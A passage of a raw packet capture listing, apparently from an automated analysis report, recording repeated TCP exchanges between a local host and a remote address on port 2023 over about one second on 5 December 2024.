                                                                                                                  Dec 5, 2024 10:46:38.887626886 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:38.887717962 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:38.887764931 CET497382023192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:46:38.888794899 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:38.888917923 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:38.888963938 CET497382023192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:46:38.889996052 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:38.890079021 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:38.890125990 CET497382023192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:46:38.891055107 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:38.891149044 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:38.891196012 CET497382023192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:46:38.892216921 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:38.892291069 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:38.892333984 CET497382023192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:46:38.893315077 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:38.893425941 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:38.893471956 CET497382023192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:46:38.894526005 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:38.894653082 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:38.894699097 CET497382023192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:46:38.895596981 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:38.895706892 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:38.895754099 CET497382023192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:46:38.896754026 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:38.896836996 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:38.896883965 CET497382023192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:46:38.897885084 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:38.897975922 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:38.898020983 CET497382023192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:46:38.899023056 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:38.899136066 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:38.899183035 CET497382023192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:46:38.900187016 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:38.900264025 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:38.900316000 CET497382023192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:46:38.901298046 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:38.901443958 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:38.901493073 CET497382023192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:46:38.902466059 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:38.902543068 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:38.902591944 CET497382023192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:46:38.903584957 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:38.903704882 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:38.903743982 CET497382023192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:46:38.904731035 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:38.904858112 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:38.904903889 CET497382023192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:46:38.905846119 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:38.905976057 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:38.906021118 CET497382023192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:46:38.907021999 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:38.907166958 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:38.907212019 CET497382023192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:46:38.908251047 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:38.908444881 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:38.908488989 CET497382023192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:46:38.909270048 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:38.909434080 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:38.909481049 CET497382023192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:46:38.910445929 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:38.910548925 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:38.910598993 CET497382023192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:46:38.911623955 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:38.911710978 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:38.911755085 CET497382023192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:46:38.912905931 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:38.912959099 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:38.913003922 CET497382023192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:46:38.913865089 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:38.914040089 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:38.914083958 CET497382023192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:46:38.914953947 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:38.915034056 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:38.915080070 CET497382023192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:46:38.916131020 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:38.916239977 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:38.916285038 CET497382023192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:46:38.917282104 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:38.917397976 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:38.917439938 CET497382023192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:46:38.918412924 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:38.918524981 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:38.918559074 CET497382023192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:46:38.919843912 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:38.919914007 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:38.919958115 CET497382023192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:46:38.920814037 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:38.920845032 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:38.920882940 CET497382023192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:46:38.921791077 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:38.921902895 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:38.921953917 CET497382023192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:46:38.922985077 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:38.923005104 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:38.923058033 CET497382023192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:46:38.924139977 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:38.924215078 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:38.924257994 CET497382023192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:46:38.925228119 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:38.925349951 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:38.925398111 CET497382023192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:46:38.926412106 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:38.926534891 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:38.926579952 CET497382023192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:46:38.927625895 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:38.927740097 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:38.927787066 CET497382023192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:46:38.928637028 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:38.928721905 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:38.928767920 CET497382023192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:46:38.929851055 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:38.929979086 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:38.930022955 CET497382023192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:46:38.930979013 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:38.977178097 CET497382023192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:46:39.260168076 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:39.260195971 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:39.260284901 CET497382023192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:46:39.260325909 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:39.260368109 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:39.260407925 CET497382023192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:46:39.260956049 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:39.260967970 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:39.261013031 CET497382023192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:46:39.261626959 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:39.261713982 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:39.261754036 CET497382023192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:46:39.262264013 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:39.262348890 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:39.262389898 CET497382023192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:46:39.263137102 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:39.263217926 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:39.263257980 CET497382023192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:46:39.264163017 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:39.264305115 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:39.264347076 CET497382023192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:46:39.265096903 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:39.265328884 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:39.265450954 CET497382023192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:46:39.265944958 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:39.266037941 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:39.266083956 CET497382023192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:46:39.266787052 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:39.266882896 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:39.266946077 CET497382023192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:46:39.267682076 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:39.267740965 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:39.267786026 CET497382023192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:46:39.268871069 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:39.268999100 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:39.269037008 CET497382023192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:46:39.270418882 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:39.270597935 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:39.270637989 CET497382023192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:46:39.271832943 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:39.271975994 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:39.272011042 CET497382023192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:46:39.273056984 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:39.273132086 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:39.273175001 CET497382023192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:46:39.274372101 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:39.274483919 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:39.274528980 CET497382023192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:46:39.275876999 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:39.276038885 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:39.276134968 CET497382023192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:46:39.277117014 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:39.277267933 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:39.277313948 CET497382023192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:46:39.278398037 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:39.278564930 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:39.278605938 CET497382023192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:46:39.279529095 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:39.279692888 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:39.279733896 CET497382023192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:46:39.280682087 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:39.280767918 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:39.280808926 CET497382023192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:46:39.281492949 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:39.281646967 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:39.281694889 CET497382023192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:46:39.282248020 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:39.282284975 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:39.282319069 CET497382023192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:46:39.283432961 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:39.283493996 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:39.283541918 CET497382023192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:46:39.284425974 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:39.284498930 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:39.284533978 CET497382023192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:46:39.285408020 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:39.285475016 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:39.285517931 CET497382023192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:46:39.286511898 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:39.286611080 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:39.286658049 CET497382023192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:46:39.287381887 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:39.287487030 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:39.287529945 CET497382023192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:46:39.288225889 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:39.288297892 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:39.288335085 CET497382023192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:46:39.289341927 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:39.289426088 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:39.289467096 CET497382023192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:46:39.290349007 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:39.290447950 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:39.290496111 CET497382023192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:46:39.291305065 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:39.291435003 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:39.291480064 CET497382023192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:46:39.292201996 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:39.292270899 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:39.292310953 CET497382023192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:46:39.293248892 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:39.293262005 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:39.293301105 CET497382023192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:46:39.294249058 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:39.294341087 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:39.294383049 CET497382023192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:46:39.295356989 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:39.295399904 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:39.295440912 CET497382023192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:46:39.296473026 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:39.296530962 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:39.296572924 CET497382023192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:46:39.297672033 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:39.297786951 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:39.297827005 CET497382023192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:46:39.298768997 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:39.298849106 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:39.298887014 CET497382023192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:46:39.299890041 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:39.299976110 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:39.300020933 CET497382023192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:46:39.301209927 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:39.301260948 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:39.301302910 CET497382023192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:46:39.302242994 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:39.302324057 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:39.302360058 CET497382023192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:46:39.303318977 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:39.303416967 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:39.303452015 CET497382023192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:46:39.304474115 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:39.304533958 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:39.304574013 CET497382023192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:46:39.305612087 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:39.305701971 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:39.305752993 CET497382023192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:46:39.306714058 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:39.306883097 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:39.306925058 CET497382023192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:46:39.307859898 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:39.307966948 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:39.308007956 CET497382023192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:46:39.308996916 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:39.309098959 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:39.309143066 CET497382023192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:46:39.310179949 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:39.310354948 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:39.310399055 CET497382023192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:46:39.311341047 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:39.311491966 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:39.311533928 CET497382023192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:46:39.312469959 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:39.312520027 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:39.312561989 CET497382023192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:46:39.448177099 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:39.448225975 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:39.448283911 CET497382023192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:46:39.448621988 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:39.448800087 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:39.448865891 CET497382023192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:46:39.449775934 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:39.449872017 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:39.449918032 CET497382023192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:46:39.451006889 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:39.451098919 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:39.451143980 CET497382023192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:46:39.452089071 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:39.452107906 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:39.452156067 CET497382023192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:46:39.453277111 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:39.453411102 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:39.453459024 CET497382023192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:46:39.454382896 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:39.454495907 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:39.454540014 CET497382023192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:46:39.455499887 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:39.455698013 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:39.455753088 CET497382023192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:46:39.456613064 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:39.456712961 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:39.456754923 CET497382023192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:46:39.457741022 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:39.457839012 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:39.457881927 CET497382023192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:46:39.458940029 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:39.459022999 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:39.459072113 CET497382023192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:46:39.460058928 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:39.460165024 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:39.460196972 CET497382023192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:46:39.461441040 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:39.461518049 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:39.461560011 CET497382023192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:46:39.463021040 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:39.463032007 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:39.463084936 CET497382023192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:46:39.463963985 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:39.464029074 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:39.464075089 CET497382023192.168.2.445.149.241.141
